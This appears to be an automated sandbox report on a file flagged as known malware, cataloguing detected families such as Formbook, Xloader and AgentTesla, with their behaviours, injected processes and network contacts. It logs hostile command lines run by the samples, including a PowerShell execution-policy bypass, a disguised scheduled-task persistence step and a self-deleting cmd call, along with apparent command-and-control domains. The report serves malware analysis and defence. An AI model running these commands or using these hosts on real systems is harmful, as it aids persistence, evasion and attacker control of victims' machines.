Analysis Overview
SHA256
031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18
Threat Level: Known bad
The file 031527224e74b82bf16e639c666134674ecc8a6e648fed2f68255617bd6a3b18 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Remcos family
Formbook family
Guloader family
Mirai
Bitrat family
Blustealer family
Agenttesla family
Remcos
AgentTesla
BluStealer
Xloader
Formbook
Servhelper family
BitRAT
Mirai family
Guloader,Cloudeye
ServHelper
Xloader family
Remote Service Session Hijacking: RDP Hijacking
Formbook payload
Grants admin privileges
AgentTesla payload
Xloader payload
Office macro that triggers on suspicious action
Blocklisted process makes network request
Indicator Removal: Network Share Connection Removal
Possible privilege escalation attempt
Suspicious Office macro
Server Software Component: Terminal Services DLL
Modifies RDP port number used by Windows
Credentials from Password Stores: Windows Credential Manager
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads WinSCP keys stored on the system
Unsecured Credentials: Credentials In Files
Modifies file permissions
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Indicator Removal: File Deletion
Command and Scripting Interpreter: PowerShell
Adds Run key to start application
Suspicious use of SetThreadContext
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Unsigned PE
Permission Groups Discovery: Local Groups
System Location Discovery: System Language Discovery
Browser Information Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetWindowsHookEx
Suspicious behavior: LoadsDriver
Script User-Agent
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Detects videocard installed
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Modifies registry key
outlook_win_path
Checks processor information in registry
Suspicious behavior: RenamesItself
outlook_office_path
Runs net.exe
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-21 20:43
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
158s
Command Line
Signatures
Credentials from Password Stores: Windows Credential Manager
Reads user/profile data of web browsers
Browser Information Discovery
Processes
C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
"C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.xivstatus.com | udp |
| US | 167.172.2.160:443 | api.xivstatus.com | tcp |
| US | 8.8.8.8:53 | 160.2.172.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.server.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/3536-0-0x00007FFC0E1E3000-0x00007FFC0E1E5000-memory.dmp
memory/3536-1-0x0000019A55A70000-0x0000019A55A92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ydke0fwo.y5v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3536-11-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
memory/3536-12-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
memory/3536-13-0x0000019A6F090000-0x0000019A6F252000-memory.dmp
memory/3536-14-0x0000019A6F790000-0x0000019A6FCB8000-memory.dmp
memory/3536-15-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
memory/3536-16-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
memory/3536-17-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
memory/3536-18-0x00007FFC0E1E3000-0x00007FFC0E1E5000-memory.dmp
memory/3536-19-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
memory/3536-20-0x00007FFC0E1E0000-0x00007FFC0ECA1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
149s
Max time network
20s
Command Line
Signatures
Formbook
Formbook family
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2380 set thread context of 900 | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 900 set thread context of 1360 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 2108 set thread context of 1360 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe
"C:\Users\Admin\AppData\Local\Temp\төлем туралы есеп#454326_PDF.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tUlSEv" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4386.tmp"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\NAPSTAT.EXE
"C:\Windows\SysWOW64\NAPSTAT.EXE"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
memory/2380-0-0x00000000744AE000-0x00000000744AF000-memory.dmp
memory/2380-1-0x0000000000DA0000-0x0000000000E86000-memory.dmp
memory/2380-2-0x00000000744A0000-0x0000000074B8E000-memory.dmp
memory/2380-3-0x0000000000490000-0x00000000004B2000-memory.dmp
memory/2380-4-0x00000000744AE000-0x00000000744AF000-memory.dmp
memory/2380-5-0x00000000744A0000-0x0000000074B8E000-memory.dmp
memory/2380-6-0x0000000005CE0000-0x0000000005D60000-memory.dmp
memory/2380-7-0x0000000000BD0000-0x0000000000C08000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4386.tmp
| MD5 | a50c2640b5274f5e598820547af97bdb |
| SHA1 | f7969aee761479dc295eb3f73c2e8860580380fc |
| SHA256 | 1b69eeb39d437222ee4506051bf9266c161dbddceeab94222e3c38993d793527 |
| SHA512 | e1df8a93c3878bac372ae9f99bbdd4091746b8c01359ab8866a4042119b0ced37105aa2b283542cd57559be6f941242263838827cf45f86ccff107e538fb8005 |
memory/900-13-0x0000000000400000-0x000000000042E000-memory.dmp
memory/900-19-0x0000000000400000-0x000000000042E000-memory.dmp
memory/900-17-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/900-15-0x0000000000400000-0x000000000042E000-memory.dmp
memory/2380-20-0x00000000744A0000-0x0000000074B8E000-memory.dmp
memory/900-21-0x00000000009E0000-0x0000000000CE3000-memory.dmp
memory/900-23-0x0000000000400000-0x000000000042E000-memory.dmp
memory/900-24-0x0000000000150000-0x0000000000164000-memory.dmp
memory/1360-25-0x0000000006BF0000-0x0000000006D19000-memory.dmp
memory/2108-27-0x00000000008C0000-0x0000000000906000-memory.dmp
memory/2108-26-0x00000000008C0000-0x0000000000906000-memory.dmp
memory/1360-28-0x0000000006BF0000-0x0000000006D19000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3124 set thread context of 3836 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3836 set thread context of 3420 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 4996 set thread context of 3420 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\Explorer.EXE |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe
"C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.somatictherapyservices.com | udp |
| US | 13.248.169.48:80 | www.somatictherapyservices.com | tcp |
| US | 8.8.8.8:53 | 48.169.248.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.armseducationassociates.com | udp |
| US | 8.8.8.8:53 | www.comunicarbuenosaires.com | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.fourteenfoodsdq.net | udp |
| US | 3.33.130.190:80 | www.fourteenfoodsdq.net | tcp |
| US | 8.8.8.8:53 | 190.130.33.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.trumpismysugardaddy.com | udp |
| US | 8.8.8.8:53 | www.raceleagues.com | udp |
| US | 8.8.8.8:53 | www.novopeugeot208.com | udp |
| US | 8.8.8.8:53 | www.kazuya.tech | udp |
| US | 8.8.8.8:53 | www.inverservi.com | udp |
| US | 69.49.115.40:80 | www.inverservi.com | tcp |
| US | 8.8.8.8:53 | 40.115.49.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youngedbg.club | udp |
| US | 8.8.8.8:53 | www.networksloss.club | udp |
| US | 8.8.8.8:53 | www.foleyautomotivehydraulics.com | udp |
| US | 8.8.8.8:53 | www.buncheese.com | udp |
| US | 8.8.8.8:53 | www.melissabelmontefotografias.com | udp |
| NL | 191.96.63.137:80 | www.melissabelmontefotografias.com | tcp |
| US | 8.8.8.8:53 | 137.63.96.191.in-addr.arpa | udp |
Files
memory/3124-0-0x0000000074E9E000-0x0000000074E9F000-memory.dmp
memory/3124-1-0x0000000000DB0000-0x0000000000E86000-memory.dmp
memory/3124-2-0x00000000082A0000-0x0000000008844000-memory.dmp
memory/3124-3-0x0000000007D90000-0x0000000007E22000-memory.dmp
memory/3124-4-0x00000000031B0000-0x00000000031BA000-memory.dmp
memory/3124-5-0x0000000074E90000-0x0000000075640000-memory.dmp
memory/3124-6-0x0000000005A10000-0x0000000005AAC000-memory.dmp
memory/3124-7-0x0000000005980000-0x0000000005988000-memory.dmp
memory/3124-8-0x0000000074E9E000-0x0000000074E9F000-memory.dmp
memory/3124-9-0x0000000074E90000-0x0000000075640000-memory.dmp
memory/3124-10-0x0000000005EE0000-0x0000000005F68000-memory.dmp
memory/3124-11-0x0000000006410000-0x000000000644A000-memory.dmp
memory/3124-14-0x0000000074E90000-0x0000000075640000-memory.dmp
memory/3420-19-0x0000000002570000-0x0000000002684000-memory.dmp
memory/3836-18-0x0000000001130000-0x0000000001140000-memory.dmp
memory/3836-17-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3836-15-0x0000000001340000-0x000000000168A000-memory.dmp
memory/3836-12-0x0000000000400000-0x0000000000429000-memory.dmp
memory/4996-22-0x0000000000580000-0x00000000009B3000-memory.dmp
memory/4996-20-0x0000000000580000-0x00000000009B3000-memory.dmp
memory/4996-23-0x0000000000CC0000-0x0000000000CE9000-memory.dmp
memory/3420-24-0x0000000002570000-0x0000000002684000-memory.dmp
memory/3420-28-0x0000000006DE0000-0x0000000006E9E000-memory.dmp
memory/3420-29-0x0000000006DE0000-0x0000000006E9E000-memory.dmp
memory/3420-31-0x0000000006DE0000-0x0000000006E9E000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
141s
Max time network
124s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Network
Files
memory/1732-4-0x000007FEF60EE000-0x000007FEF60EF000-memory.dmp
memory/1732-5-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/1732-6-0x0000000001F50000-0x0000000001F58000-memory.dmp
memory/1732-7-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
memory/1732-9-0x0000000002B80000-0x0000000002B9C000-memory.dmp
memory/1732-11-0x0000000002BA0000-0x0000000002BAE000-memory.dmp
memory/1732-10-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
memory/1732-8-0x0000000002B70000-0x0000000002B7C000-memory.dmp
memory/1732-12-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
memory/1732-13-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
memory/1732-14-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
memory/1732-15-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
memory/1732-16-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20241010-en
Max time kernel
66s
Max time network
19s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2304 set thread context of 2552 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
Network
Files
memory/2304-0-0x000000007430E000-0x000000007430F000-memory.dmp
memory/2304-1-0x0000000000A50000-0x0000000000B34000-memory.dmp
memory/2304-2-0x0000000074300000-0x00000000749EE000-memory.dmp
memory/2304-3-0x0000000000510000-0x0000000000532000-memory.dmp
memory/2304-4-0x000000007430E000-0x000000007430F000-memory.dmp
memory/2304-5-0x0000000074300000-0x00000000749EE000-memory.dmp
memory/2304-6-0x0000000005130000-0x00000000051AA000-memory.dmp
memory/2304-7-0x0000000004F80000-0x0000000004FB2000-memory.dmp
memory/2552-9-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2552-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2552-14-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2552-10-0x0000000000400000-0x0000000000428000-memory.dmp
memory/2304-15-0x0000000074300000-0x00000000749EE000-memory.dmp
memory/2552-16-0x0000000000B40000-0x0000000000E43000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240729-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
BluStealer
Blustealer family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2072 set thread context of 2904 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
Files
memory/2072-0-0x000000007485E000-0x000000007485F000-memory.dmp
memory/2072-1-0x0000000000A30000-0x0000000000B5A000-memory.dmp
memory/2072-2-0x0000000074850000-0x0000000074F3E000-memory.dmp
memory/2072-3-0x0000000000530000-0x0000000000552000-memory.dmp
memory/2072-4-0x000000007485E000-0x000000007485F000-memory.dmp
memory/2072-5-0x0000000074850000-0x0000000074F3E000-memory.dmp
memory/2072-6-0x0000000006370000-0x0000000006408000-memory.dmp
memory/2072-7-0x0000000005660000-0x00000000056B0000-memory.dmp
memory/2904-10-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2904-14-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2904-12-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2904-9-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2904-8-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2904-16-0x0000000000400000-0x0000000000448000-memory.dmp
memory/2072-19-0x0000000074850000-0x0000000074F3E000-memory.dmp
memory/2904-20-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win7-20240903-en
Max time kernel
149s
Max time network
121s
Command Line
Signatures
Xloader
